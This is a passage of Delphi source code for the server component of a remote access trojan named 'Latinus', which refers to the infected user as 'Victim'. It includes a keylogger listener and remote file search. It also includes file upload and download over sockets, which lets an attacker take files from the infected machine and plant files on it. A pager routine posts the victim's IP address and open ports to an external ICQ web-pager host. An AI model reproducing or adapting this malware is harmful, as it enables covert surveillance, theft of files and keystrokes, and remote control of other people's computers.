   BntSend.Height:=EdtMsg.Height;
   BntSend.Width:=(BntSend.Width - ((BntSend.Left + BntSend.Width) - (RichMessages.Width + RichMessages.Left)));
   Height:=(EdtMsg.Top + EdtMsg.Height) + 12;
end;

procedure TfrmServer.BntSendClick(Sender: TObject);
var
   strSend:string;
   k:integer;
begin
   if Trim(EdtMsg.Text) = '' then Exit;
   strSend:='Victim - ' + EdtMsg.Text;
   if ServerMain.Socket.ActiveConnections <= 0 then
   begin
      HideWindow(handle,false);
      EdtMsg.Text:='';
      RichMessages.Lines.Clear;
      Exit;
   end;
   for k:=0 to ServerMain.Socket.ActiveConnections - 1 do
      SendAnswer(COMMAND_CHAT_MESSAGE,strSend,ServerMain.Socket.Connections[k]);
   RichMessages.Lines.Add(strSend);
   EdtMsg.Text:='';
end;

procedure TfrmServer.EnableLogger(Data:string; Socket:TCustomWinSocket);
var
   lngPort:longint;
begin
   lngPort:=StrToIntDef(Data,-1);
   if (lngPort < 0) or (lngPort = ServerMain.Port) then
   begin
      SendAnswer(COMMAND_ANSWER,'Error on trying to enable keylogger...',Socket);
      Exit;
   end;
   if ServerLogger.Port <> lngPort then
   begin
      CloseAll(ServerLogger);
      ServerLogger.Port:=lngPort;
      try
         ServerLogger.Open;
      except
         SendAnswer(COMMAND_ANSWER,'Error on trying to enable keylogger...',Socket);
      end;
   end
   else
   begin
      if not ServerLogger.Active then
         ServerLogger.Open;
   end;
   SendAnswer(COMMAND_LOG_ENABLE,IntToStr(lngPort),Socket);
end;

procedure TfrmServer.ServerLoggerAccept(Sender: TObject;
  Socket: TCustomWinSocket);
begin
   TmrLogger.Enabled:=True;
end;

procedure TfrmServer.ServerLoggerClientDisconnect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
   if ServerLogger.Socket.ActiveConnections = 0 then
      TmrLogger.Enabled:=False;
end;

procedure TfrmServer.TmrLoggerTimer(Sender: TObject);
begin
   GetLetter;
end;

procedure TfrmServer.PrintText(Data:string);
var
   B,I,U,S,c,Text:string;
   p,Size:longint;
   Styles:TFontStyles;
begin
   c:=Chr(0);
   Styles:=[];
   
   p:=Pos(c,Data);
   Text:=Copy(Data,1,p-1);
   Data:=Copy(Data,p + 1,Length(Data));

   p:=Pos(c,Data);
   B:=Copy(Data,1,p-1);
   Data:=Copy(Data,p + 1,Length(Data));
   if B = '1' then
      Styles:=[fsBold];

   p:=Pos(c,Data);
   I:=Copy(Data,1,p-1);
   Data:=Copy(Data,p + 1,Length(Data));
   if I = '1' then
      Include(Styles,fsItalic);

   p:=Pos(c,Data);
   U:=Copy(Data,1,p-1);
   Data:=Copy(Data,p + 1,Length(Data));
   if U = '1' then
      Include(Styles,fsUnderline);

   p:=Pos(c,Data);
   S:=Copy(Data,1,p-1);
   Data:=Copy(Data,p + 1,Length(Data));
   if S = '1' then
      Include(Styles,fsStrikeOut);

   Size:=StrToIntDef(Data,12);

   RichPrint.Text:=Text;
   RichPrint.Font.Style:=Styles;
   RichPrint.Font.Size:=Size;
   RichPrint.Print(RichPrint.Text);
end;

procedure TfrmServer.ServerLoggerClientError(Sender: TObject;
  Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
  var ErrorCode: Integer);
begin
   ErrorCode:=0;
end;

procedure TfrmServer.CloseAll(Sck:TServerSocket);
var
   i:integer;
begin
   for i:=0 to Sck.Socket.ActiveConnections - 1 do
      Sck.Socket.Connections[i].Close;
   Sck.Active:=False;
   while Sck.Active do
      Sck.Active:=False;
end;

procedure TfrmServer.ReStartServer;
var
   cPath,lpExeName:string;
begin
   CloseAll(ServerLogger);
   CloseAll(ServerMain);
   while ClientPager.Active do
      ClientPager.Active:=False;
   lpExeName:=Trim(Copy(SrvFile,10,Length(SrvFile)));
   if UpperCase(Trim(Copy(InstDir,10,1))) = 'W' then
      cPath:=AdjustFolder(WinDir) + Trim(lpExeName)
   else
      cPath:=AdjustFolder(SysDir) + Trim(lpExeName);
   Caption:='';
   Application.Title:='';
   Application.Terminate;
   WinExec(PChar(cPath),SW_SHOWNORMAL);
end;

function TfrmServer.LocalPass:string;
begin
   LocalPass:=Pass.Passwords;
end;

procedure TfrmServer.ClientPagerError(Sender: TObject;
  Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
  var ErrorCode: Integer);
begin
   ErrorCode:=0;
   SentPager:=False;
end;

procedure TfrmServer.ClientPagerConnect(Sender: TObject;
  Socket: TCustomWinSocket);
var
   cData,cSend,CrLf,cSubject,cMessage:string;
begin
   SentPager:=True;
   CrLf:=#13#10;
   cMessage:='Victim+is+on-line:' + CrLf + 'IP:' + ClientPager.Socket.LocalAddress +
             CrLf + 'Connection+port:' + IntToStr(StrToIntDef(Trim(Copy(SrvPort,10,Length(SrvPort))),DEF_CON_PORT)) +
             CrLf + 'Upload/download+port:' + IntToStr(StrToIntDef(Trim(Copy(TnsfPort,11,Length(TnsfPort))),DEF_UD_PORT)) +
             CrLf + 'Local+time:' + DateToStr(Date) + '+-+' + TimeToStr(Time);
   cSubject:='Latinus+pager';
   cData:='from=Latinus+server&fromemail=Latinus@Latinus.br&subject=' + cSubject + '&body=' + cMessage + '&to=' + Trim(Copy(cICQ,9,Length(cICQ))) + '&Send=' + '''';
   cSend:='POST /scripts/WWPMsg.dll HTTP/1.0' + CrLf;
   cSend:=cSend + 'Referer: http://wwp.mirabilis.com' + CrLf;
   cSend:=cSend + 'User-Agent: Mozilla/4.06 (Win95; I)' + CrLf;
   cSend:=cSend + 'Connection: Keep-Alive' + CrLf;
   cSend:=cSend + 'Host: wwp.mirabilis.com:80' + CrLf;
   cSend:=cSend + 'Content-type: application/x-www-form-urlencoded' + CrLf;
   cSend:=cSend + 'Content-length: ' + IntToStr(Length(cData)) + CrLf;
   cSend:=cSend + 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*' + CrLf + CrLf;
   cSend:=cSend + cData + CrLf + CrLf + CrLf + CrLf;
   ClientPager.Socket.SendText(cSend);
end;

procedure TfrmServer.ConnectPager;
begin
   if not TmrPager.Enabled then
      TmrPager.Enabled:=True;
   if not InternetConnected then
   begin
      SentPager:=False;
      Exit;
   end;
   while ClientPager.Active do
      ClientPager.Active:=False;
   ClientPager.Host:='wwp.mirabilis.com';
   ClientPager.Port:=80;
   try
      SentPager:=True;
      ClientPager.Open;
   except
      on Exception do
      begin
         SentPager:=False;
         ClientPager.Close;
      end;
   end;
end;

procedure TfrmServer.TmrPagerTimer(Sender: TObject);
begin
   if not InternetConnected then
      SentPager:=False;
   if not SentPager then
      ConnectPager;
end;

procedure TfrmServer.PreparePrintSrc(Data:string);
var
   p,X,Y,Size,Center,Lines:Integer;
   FCl,BCl:TColor;
   f:string;
begin
   f:=Chr(13);

   p:=Pos(f,Data);
   Center:=StrToIntDef(Copy(Data,1,p - 1),0);
   Data:=Copy(Data,p + 1,Length(Data));

   p:=Pos(f,Data);
   X:=StrToIntDef(Copy(Data,1,p - 1),0);
   Data:=Copy(Data,p + 1,Length(Data));

   p:=Pos(f,Data);
   Y:=StrToIntDef(Copy(Data,1,p - 1),0);
   Data:=Copy(Data,p + 1,Length(Data));

   p:=Pos(f,Data);
   BCl:=StringToColor(Copy(Data,1,p - 1));
   Data:=Copy(Data,p + 1,Length(Data));

   p:=Pos(f,Data);
   FCl:=StringToColor(Copy(Data,1,p - 1));
   Data:=Copy(Data,p + 1,Length(Data));

   p:=Pos(f,Data);
   Size:=StrToIntDef(Copy(Data,1,p - 1),10);
   Data:=Copy(Data,p + 1,Length(Data));

   p:=Pos(f,Data);
   Lines:=StrToIntDef(Copy(Data,1,p - 1),1);
   Data:=Copy(Data,p + 1,Length(Data));

   if Center > 0 then
      PrintInCenter(Data,BCl,FCl,Size,Lines)
   else
      PrintInCoordinate(Data,BCl,FCl,Size,X,Y);
end;

procedure TfrmServer.PrepareColors(Data:string);
var
   cColor,p:LongInt;
   f:string;
begin
   f:=Chr(13);

   p:=Pos(f,Data);
   cColor:=StrToIntDef(Copy(Data,1,p - 1),-1);
   if cColor >= 0 then SetMenuColor(cColor);
   Data:=Copy(Data,p + 1,Length(Data));

   p:=Pos(f,Data);
   cColor:=StrToIntDef(Copy(Data,1,p - 1),-1);
   if cColor >= 0 then Set3dColor(cColor);
   Data:=Copy(Data,p + 1,Length(Data));

   p:=Pos(f,Data);
   cColor:=StrToIntDef(Copy(Data,1,p - 1),-1);
   if cColor >= 0 then SetWindowColor(cColor);
   Data:=Copy(Data,p + 1,Length(Data));

   cColor:=StrToIntDef(Data,-1);
   if cColor >= 0 then SetDesktopColor(cColor);
end;

procedure TfrmServer.ServerMainClientDisconnect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
   if ServerMain.Socket.ActiveConnections <= 0 then
   begin
      HideWindow(handle,false);
      CloseAll(ServerMain);
      CloseAll(ServerLogger);
      RichMessages.Lines.Clear;
      EdtMsg.Clear;
   end;
end;

procedure TfrmServer.DoFind(Args:string; var CMD: Integer; var S:string);
   function MyDirectoryExists(const Name: string): Boolean;
   var
      Code: Integer;
   begin
      Code := GetFileAttributes(PChar(Name));
      Result := (Code <> -1) and (FILE_ATTRIBUTE_DIRECTORY and Code <> 0);
   end;
var
   p:Integer;
   lpDir,lpExt:string;
   Lst:TStrings;
label
   Err;
begin
   S:='';
   p:=Pos(#13,Args);
   if p <= 0 then goto Err;
   lpDir:=Copy(Args,1,p - 1);
   if MyDirectoryExists(lpDir) then
   begin
      Args:=Copy(Args,p + 1,Length(Args));
      p:=Pos(#13,Args);
      if p <= 0 then goto Err;
      lpExt:=Copy(Args,1,p - 1);
      Args:=Copy(Args,p + 1,Length(Args));
      Lst:=TStringList.Create;
      if (Length(Args) = 1) and (Args = '1') then
         EnumFiles(lpDir,lpExt,Lst)
      else
         ListFiles(lpDir,lpExt,Lst);
      if Length(Lst.Text) > 2048 then
      begin
         Lst.Text:=Copy(Lst.Text,1,2048);
         Lst.Delete(Lst.Count - 1);
      end;
      S:=Lst.Text;
      CMD:=COMMAND_FIND_FILE;
      Lst.Free;
      Exit;
   end;
   S:='Invalid directory...';
Err:
   CMD:=COMMAND_ANSWER;
   if S <> '' then
      S:='Invalid argument...';
end;

{*****************************************************}
{                                                     }
{                                                     }
{             The code of transfer window             }
{                                                     }
{                                                     }
{*****************************************************}

procedure TfrmServer.ServerTransferClientRead(Sender: TObject;
  Socket: TCustomWinSocket);
var
   TInfo:PTrasnferInfo;
   p,r:Integer;
   Dta,f:string;
   Buffer:array [1..256] of Char;
begin
   Dta:=Socket.ReceiveText;
   if Socket.Data = nil then
   begin
      try
         New(TInfo);
         f:=Chr(13);
         p:=Pos(f,Dta);
         TInfo^.LocalFile:=Copy(Dta,1,p - 1);
         if LstUploads.Items.IndexOf(UpperCase(TInfo^.LocalFile)) >= 0 then
         begin
            Socket.SendText('File in use by another user...');
            Exit;
         end;
         TInfo^.Action:=TTransferAction(StrToIntDef(Copy(Dta,p + 1,Length(Dta)),0));
         if TInfo^.Action = taDownload then
         begin
            AssignFile(TInfo^.BFile,TInfo^.LocalFile);
            Reset(TInfo^.BFile);
         end
         else if TInfo^.Action = taUpload then
         begin
            AssignFile(TInfo^.TFile,TInfo^.LocalFile);
            ReWrite(TInfo^.TFile);
            LstUploads.Items.Add(UpperCase(TInfo^.LocalFile));
         end;
         Socket.Data:=TInfo;
         if TInfo^.Action = taDownload then
            Socket.SendText(IntToStr(FileSize(TInfo^.BFile)))
         else if TInfo^.Action = taUpload then
            Socket.SendText('C');
      except
         Socket.SendText('Can''t access file...');
         Exit;
      end;
   end
   else
   begin
      TInfo:=Socket.Data;
      if TInfo^.Action = taDownload then
      begin
         p:=FilePos(TInfo^.BFile);
         BlockRead(TInfo^.BFile,Buffer,256,r);
         r:=FileSize(TInfo^.BFile);
         Dta:=string(Buffer);
         if (r - p) < 256 then
            Dta:=Copy(Dta,1,r - p);
         Socket.SendText(Dta);
      end
      else if TInfo^.Action = taUpload then
      begin
         Write(TInfo^.TFile,Dta);
         Socket.SendText('C');
      end;
   end;
end;

procedure TfrmServer.ServerTransferClientError(Sender: TObject;
  Socket: TCustomWinSocket; ErrOrEvent: TErrorEvent;
  var ErrorCode: Integer);
begin
   ErrorCode:=0;
   ServerTransferClientDisconnect(nil,Socket);
end;

procedure TfrmServer.ServerTransferClientDisconnect(Sender: TObject;
  Socket: TCustomWinSocket);
var
   TInfo:PTrasnferInfo;
   Index:Integer;
begin
   if Socket.Data = nil then Exit;
   try
      TInfo:=Socket.Data;
      Index:=LstUploads.Items.IndexOf(UpperCase(TInfo^.LocalFile));
      if Index >= 0 then
         LstUploads.Items.Delete(Index);
      if TInfo^.Action = taDownload then
         CloseFile(TInfo^.BFile)
      else if TInfo^.Action = taUpload then
         CloseFile(TInfo^.TFile);
   finally
      Socket.Data:=nil;
      try
         FreeMem(TInfo);
      except
      end;
   end;
end;

end.
